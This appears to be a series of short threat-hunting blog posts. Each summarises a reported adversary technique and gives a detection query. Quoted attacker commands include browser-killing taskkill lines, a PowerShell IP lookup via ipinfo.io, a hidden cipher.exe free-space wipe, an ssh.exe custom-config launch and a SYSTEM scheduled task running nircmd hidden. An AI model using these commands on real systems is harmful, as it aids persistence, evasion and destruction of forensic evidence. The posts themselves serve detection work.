Hello everyone! LOLBAS are everywhere! And we see more and more of them abused by real adversaries. For example, OpenSSH, which is included in newer versions of Windows! Xavier Mertens shared a curious example of how threat actors abuse it. The adversary executes ssh.exe with a custom configuration file: C:\Windows\System32\OpenSSH\ssh.exe -F "C:\Windows\Temp\config" So, for example, we can hunt for ssh.exe executed with -F and a config file located under a Temp folder: event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: ("f" AND "temp") See you tomorrow!

155. Is Abusing Browser Extensions Noisy Enough?

Hello everyone! I don't often see malicious browser extensions in-the-wild, so this report by Positive Technologies definitely deserves attention. Although abusing browser extensions isn't the most common technique, the report shows that the installation process is extremely noisy. For example, the threat actors kill browser-related processes: var kalee = ["taskkill /F /IM chrome.exe", "taskkill /F /IM msedge.exe", "taskkill /F /IM brave.exe"]; Definitely worth a detector, right? event_type: "processcreatewin" AND proc_file_name: "taskkill.exe" AND cmdline: ("chrome" OR "msedge" OR "brave") Also, the threat actors collect information about the compromised system abusing ipinfo[.]io, for example: for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).ip"') do set "IP_PUBLICO=%%a" Yes, another legitimate service we can use f...

154. Threat Actors Abuse Google Apps Script for Phishing

Hello everyone! Let's talk a bit about phishing. We always tell users to check the URL. And threat actors know it! That's why they always try to make it look as legitimate as possible. Cofense Phishing Defense Center shared information on a phishing campaign in which threat actors abused Google Apps Script. Why? It made the phishing page look legitimate, as it was hosted on script[.]google[.]com. Seems like a good thing to hunt for? Why not! event_type: "dnsreq" AND dns_rname: "script.google.com" See you tomorrow!

153. Here's How Threat Actors Hinder Forensic Recovery

Hello everyone! I'm sure you love forensics. I do! But threat actors... I don't think so. That's why they have various techniques in their arsenal to hinder forensic analysis and recovery! For example, CyberLock. The adversary abused cipher.exe to wipe free space and hinder forensic recovery: Start-Process cipher.exe -ArgumentList "/w:C:\" -WindowStyle Hidden Of course, hunting for the ransomware itself isn't a good idea (it's too late by then), but we can face this procedure in other cases as well, for example, wiping free space after deleting the toolset. So it may also be a good candidate for a hunting query: event_type: "processcreatewin" AND proc_file_originalfilename: "cipher.exe" See you tomorrow!

152. Beyond Good Ol' Windows Command Shell

Hello everyone! It's definitely not a secret that adversaries often abuse various command and scripting interpreters, such as Windows Command Shell and PowerShell. But in some cases they bring their own tools to execute commands on the compromised system. For example, NirCmd. It's a small utility that allows threat actors to solve various tasks without displaying any user interface. Here's an example of how Rare Werewolf abused this tool: schtasks /create /tn "AutoUpdate Driver" /tr "C:\Users\admin\Window\nircmd.exe exec hide C:\Users\admin\Window\bat2.bat" /sc hourly /st 00:00 /ru SYSTEM /f Definitely, this utility is worth a hunting query: event_type: "processcreatewin" AND proc_file_originalfilename: "nircmd.exe" AND cmdline: "hide" See you tomorrow!